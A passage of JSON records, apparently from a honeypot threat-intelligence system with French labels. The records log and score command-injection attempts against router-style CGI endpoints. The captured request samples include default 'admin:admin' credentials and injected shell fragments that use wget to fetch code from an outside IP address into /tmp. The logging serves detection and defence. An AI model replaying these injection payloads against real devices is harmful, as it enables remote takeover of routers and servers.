\u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002282\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_auth_header_token\u0022, \u0022http_basic_auth\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:82","http_user_agent":null,"http_referer":null,"tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_auth_header_token\u0022, \u0022http_basic_auth\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022]","anomalies":"[]","severity":10,"bytes_in":529},{"id":11809354,"ip":"45.153.34.219","ts":"2026-07-14 02:18:13.000000","proto":"tcp","src_port":55222,"dst_port":82,"service":"http","classification":"cmd_injection","waf_score":40,"waf_tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022]","http_method":"POST","http_target":"\/storage\/apply.cgi","sensor_id":"paris-1","meta":"{\u0022http_header_count\u0022: 5, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 2, \u0022http_path_ext\u0022: \u0022cgi\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022b00c56701bd04898edc8a488547d32d613363649\u0022, \u0022http_target_hash\u0022: \u0022add1b8e10b8941fd0e4f371c263f3015864c76c9\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022POST\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 415, \u0022payload_entropy\u0022: 5.330691389309984, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 82, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 35.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 15, \u0022risk_granularity\u0022: 6.2, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 81, \u0022tag_count\u0022: 12, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u00224c5d5d8852405ca762aa6944515a8cf24a4754e5\u0022, \u0022event_fingerprint\u0022: \u0022cea8b0615fbbb4a2035b295014d0330b299f0a89\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 142, \u0022precision_signals\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022kb_rule_ids\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022matched_patterns\u0022: [\u0022pat-0842\u0022, \u0022pat-0463\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 921130 duplicate CL\u0022, \u0022Cred Basic auth spray\u0022, \u0022CRS 932205\u0022, \u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0842\u0022, \u0022pat-0463\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u00224119d6a3c28226f207fecaeea9913e36\u0022, \u0022path_pattern_hash\u0022: \u002283b3b174f9cbd5824928567f1b35cdbf\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 81}, \u0022payload_preview\u0022: \u0022POST \/storage\/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-fo\u0022, \u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/storage\/apply.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/storage\/apply.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/storage\/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 230\\r\\nConnection: close\\r\\n\\r\\nnext_page=\/tmp\/.s\u0026submit_button=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\u0022, \u0022payload_snippet\u0022: \u0022POST \/storage\/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-fo\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/storage\/apply.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/storage\/apply.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/storage\/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 230\\r\\nConnection: close\\r\\n\\r\\nnext_page=\/tmp\/.s\u0026submit_button=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\u0022, \u0022payload_snippet\u0022: \u0022POST \/storage\/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-fo\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1059\u0022, \u0022T1190\u0022], \u0022mitre\u0022: \u0022T1059\u0022, \u0022threat_family\u0022: [\u0022rce_probe\u0022, \u0022ssrf_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u0022c149cd6c37292bf4325981a4e788ffe48d83be66\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/storage\/apply.cgi\u0022, \u0022request_line\u0022: \u0022POST \/storage\/apply.cgi HTTP\/1.1\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022POST \/storage\/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-fo\u0022, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/storage\/apply.cgi\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 81\/100 (\u00c9lev\u00e9) \u2014 MITRE T1059 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 81, \u0022risk_label\u0022: \u0022\u00c9lev\u00e9\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 82, \u0022protocol_emulated\u0022: null, \u0022tags_summary\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022Http Cmdi\u0022, \u0022pat-0146\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1059\u0022, \u0022mitre_technique\u0022: \u0022T1059\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/storage\/apply.cgi\u0022, \u0022request_line\u0022: \u0022POST \/storage\/apply.cgi HTTP\/1.1\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/storage\/apply.cgi\u0022, \u0022evidence_snippet\u0022: \u0022POST \/storage\/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-fo\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 6 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002282\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_auth_header_token\u0022, \u0022http_basic_auth\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:82","http_user_agent":null,"http_referer":null,"tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_auth_header_token\u0022, \u0022http_basic_auth\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022]","anomalies":"[]","severity":10,"bytes_in":415},{"id":11809355,"ip":"45.153.34.219","ts":"2026-07-14 02:18:13.000000","proto":"tcp","src_port":55252,"dst_port":82,"service":"http","classification":"cmd_injection","waf_score":34,"waf_tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022]","http_method":"POST","http_target":"\/apply.cgi","sensor_id":"paris-1","meta":"{\u0022http_header_count\u0022: 5, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 1, \u0022http_path_ext\u0022: \u0022cgi\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022b00c56701bd04898edc8a488547d32d613363649\u0022, \u0022http_target_hash\u0022: \u002231402cc48ac7ac052e1d50fc94349665a12c2c45\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022POST\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 432, \u0022payload_entropy\u0022: 5.342376909347123, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 82, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 35.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 15, \u0022risk_granularity\u0022: 6.2, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 81, \u0022tag_count\u0022: 11, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u00224a83991c6cb900d0fb00b4b6aafa98c9742d42ef\u0022, \u0022event_fingerprint\u0022: \u00226b2c5ff3085684c662d172d85fc6520b04bcf832\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 142, \u0022precision_signals\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022kb_rule_ids\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022matched_patterns\u0022: [\u0022pat-0842\u0022, \u0022pat-0463\u0022, \u0022pat-0146\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 921130 duplicate CL\u0022, \u0022Cred Basic auth spray\u0022, \u0022CRS 932205\u0022], \u0022pattern_ids\u0022: [\u0022pat-0842\u0022, \u0022pat-0463\u0022, \u0022pat-0146\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u0022277ee8efe7ade651c38e7bda72a15310\u0022, \u0022path_pattern_hash\u0022: \u0022b3e1dfd605a877958cebee595444f5d1\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 81}, \u0022payload_preview\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-urlen\u0022, \u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/apply.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/apply.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 255\\r\\nConnection: close\\r\\n\\r\\naction=Apply\u0026change_action=gozila_cgi\u0026submit_type=\u0026pptp_ip=cd%20\/tmp%3Bwget%20h\u0022, \u0022payload_snippet\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-urlen\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/apply.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/apply.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 255\\r\\nConnection: close\\r\\n\\r\\naction=Apply\u0026change_action=gozila_cgi\u0026submit_type=\u0026pptp_ip=cd%20\/tmp%3Bwget%20h\u0022, \u0022payload_snippet\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-urlen\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1059\u0022, \u0022T1190\u0022], \u0022mitre\u0022: \u0022T1059\u0022, \u0022threat_family\u0022: [\u0022rce_probe\u0022, \u0022ssrf_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u0022a7dc4bad16899f016b3b974203581ea8007f1aee\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/apply.cgi\u0022, \u0022request_line\u0022: \u0022POST \/apply.cgi HTTP\/1.1\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-urlen\u0022, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/apply.cgi\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 81\/100 (\u00c9lev\u00e9) \u2014 MITRE T1059 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 81, \u0022risk_label\u0022: \u0022\u00c9lev\u00e9\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 82, \u0022protocol_emulated\u0022: null, \u0022tags_summary\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022Http Cmdi\u0022, \u0022pat-0146\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1059\u0022, \u0022mitre_technique\u0022: \u0022T1059\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/apply.cgi\u0022, \u0022request_line\u0022: \u0022POST \/apply.cgi HTTP\/1.1\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/apply.cgi\u0022, \u0022evidence_snippet\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-urlen\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 5 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, 